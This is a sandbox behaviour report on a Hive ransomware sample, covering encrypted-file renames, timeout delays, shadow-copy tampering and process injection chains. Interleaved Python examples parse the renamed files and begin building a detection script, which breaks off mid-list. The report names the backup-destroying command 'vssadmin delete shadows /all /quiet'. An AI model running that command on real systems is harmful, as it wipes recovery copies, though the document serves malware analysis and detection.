File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYMXB.TTF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\th.pak C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Reflection.DispatchProxy.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE.xhylKSmuz5RNbZ6NUxzXXl1z1Llp7988Z82sMGmoKzY.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-GB.pak.DATA C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileMediumSquare.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlCone.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\TipRes.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\WebviewOffline.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\Wide310x150Logo.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotThrow.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Vbe.Interop.dll.xhylKSmuz5RNbZ6NUxzXXhH4QPoJ3sptJm3jUOv79yA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-util-l1-1-0.dll.xhylKSmuz5RNbZ6NUxzXXoaMYv-VtvQnY7j94fIKw2c.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk\msipc.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxK C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ITCKRIST.TTF.xhylKSmuz5RNbZ6NUxzXXiB8Xp4h7IRlxbfcwtaDC1c.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OIMG.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\flavormap.properties.xhylKSmuz5RNbZ6NUxzXXvTOAj-qg8A95u6AO2R0KCU.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.ServiceModel.Web.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pt-PT.pak.DATA C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Wide310x150Logo.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrwbin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_vi.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdaer.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gl.pak.DATA C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ul-oob.xrm-ms.xhylKSmuz5RNbZ6NUxzXXk9pUMQCpzYNCsVEnAHz7iU.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\SmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.xhylKSmuz5RNbZ6NUxzXXj8xx3rS5iJ-C8wFzHKKCxg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\multiple-plans.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmpersistence_xl.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\msipc.dll.mui.xhylKSmuz5RNbZ6NUxzXXjXcBHj2oBoW-1ozTi16hRk.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ko_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg2.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSplashLogo.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
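Three of the rows above already carry the encrypted-file name shape seen in this run: the original name, a dot, a 43-character base64url token, and the `.hive` extension (for example `MSO.DLL.xhylKSmuz5RNbZ6NUxzXXj8xx3rS5iJ-C8wFzHKKCxg.hive`). The following Python is an added example and not part of the sandbox report: it parses rows in the report's "File opened for modification" format, pulls out the token, decodes it and measures how much of it is shared between files. The four sample rows are copied from the table above; reading the token as key material is an assumption, the report itself only records the rename.

```python
import base64
import re

# Sample rows copied from this report's "File opened for modification" table.
# Three carry the .hive suffix, the fourth (goopdateres_vi.dll) does not.
SAMPLE_ROWS = [
    r"File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ul-oob.xrm-ms.xhylKSmuz5RNbZ6NUxzXXk9pUMQCpzYNCsVEnAHz7iU.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A",
    r"File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.xhylKSmuz5RNbZ6NUxzXXj8xx3rS5iJ-C8wFzHKKCxg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A",
    r"File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\msipc.dll.mui.xhylKSmuz5RNbZ6NUxzXXjXcBHj2oBoW-1ozTi16hRk.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A",
    r"File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_vi.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A",
]

# Row layout: "File opened for modification <path with spaces> <process path> <target>".
# The process path in this report contains no spaces, which is what makes the split unambiguous.
ROW_RE = re.compile(
    r"^File opened for modification (?P<path>.+?) (?P<proc>[A-Za-z]:\\\S+) (?P<target>\S+)$"
)
# <original name>.<43 base64url chars>.hive, the shape seen in the rows above
HIVE_RE = re.compile(r"^(?P<orig>.+)\.(?P<token>[A-Za-z0-9_-]{43})\.hive$")


def parse_rows(rows):
    """Return (path, writing process) pairs for rows that match the report layout."""
    out = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            out.append((m.group("path"), m.group("proc")))
    return out


def split_hive_name(path):
    """(original file name, token) if the name carries the .hive suffix, else None."""
    name = path.rsplit("\\", 1)[-1]
    m = HIVE_RE.match(name)
    if not m:
        return None
    return m.group("orig"), m.group("token")


def decode_token(token):
    """43 unpadded base64url characters carry 258 bits; padded and decoded that is 32 bytes."""
    pad = "=" * (-len(token) % 4)
    return base64.urlsafe_b64decode(token + pad)


def common_prefix_len(blobs):
    """Number of leading bytes identical across all blobs (0 for an empty list)."""
    n = 0
    for chunk in zip(*blobs):
        if len(set(chunk)) != 1:
            break
        n += 1
    return n


def analyse(rows):
    """Extract every .hive rename from the rows and summarise the decoded tokens."""
    encrypted = []
    for path, proc in parse_rows(rows):
        parts = split_hive_name(path)
        if parts is None:
            continue
        original, token = parts
        encrypted.append({
            "path": path,
            "original": original,
            "token": token,
            "token_bytes": decode_token(token),  # assumed to be key material, see lead-in
            "writer": proc,
        })
    blobs = [e["token_bytes"] for e in encrypted]
    return {
        "encrypted": encrypted,
        "token_lengths": sorted({len(b) for b in blobs}),
        "shared_prefix_bytes": common_prefix_len(blobs),
        "writers": sorted({e["writer"] for e in encrypted}),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_ROWS)
    for e in result["encrypted"]:
        print(e["original"], "->", e["token_bytes"].hex())
    print("decoded lengths:", result["token_lengths"],
          "shared prefix bytes:", result["shared_prefix_bytes"])
```

Run against the three encrypted names above, every token decodes to exactly 32 bytes and the first 16 decoded bytes are identical across files (the 21 shared leading characters plus the top bits of the 22nd cover a whole 16th byte), with the remaining 16 bytes differing per file. Whether that shared half is a per-host or per-run identifier is not something this report establishes; the split itself is what a triage script can measure from the file table alone.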

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A (23 process instances; the table's other 41 rows are entirely N/A)

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4344 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 688 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1424 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1424 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 688 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware
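The signatures above describe one lineage: the sample in AppData\Local\Temp spawns two cmd.exe instances, one running shadow.bat and one running hive.bat; the WriteProcessMemory table shows PID 1424 spawning vssadmin.exe (delete shadows /all /quiet) and PID 688 spawning timeout.exe over and over (timeout 1). Which cmd.exe ran which batch file is inferred here from those children; the report does not state it directly. The Python below is an added example, not part of the report: it rebuilds a process tree from constructed process-creation events modelled on that table and applies three detections a SOC would run over EDR telemetry. The parent PID 1000 for the sample, the explorer.exe process and the benign `vssadmin list shadows` are constructed negatives, and the ATT&CK technique IDs are this example's mapping, not one the report states.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (pid, ppid, image, command line).
# PIDs 4344, 688, 1424, 1436 and the timeout children are taken from this
# report's WriteProcessMemory table; PPID 1000, PID 5000 and PIDs 7001/7002
# are invented negatives (an explorer-launched admin listing shadows).
EVENTS = [
    (4344, 1000, r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"'),
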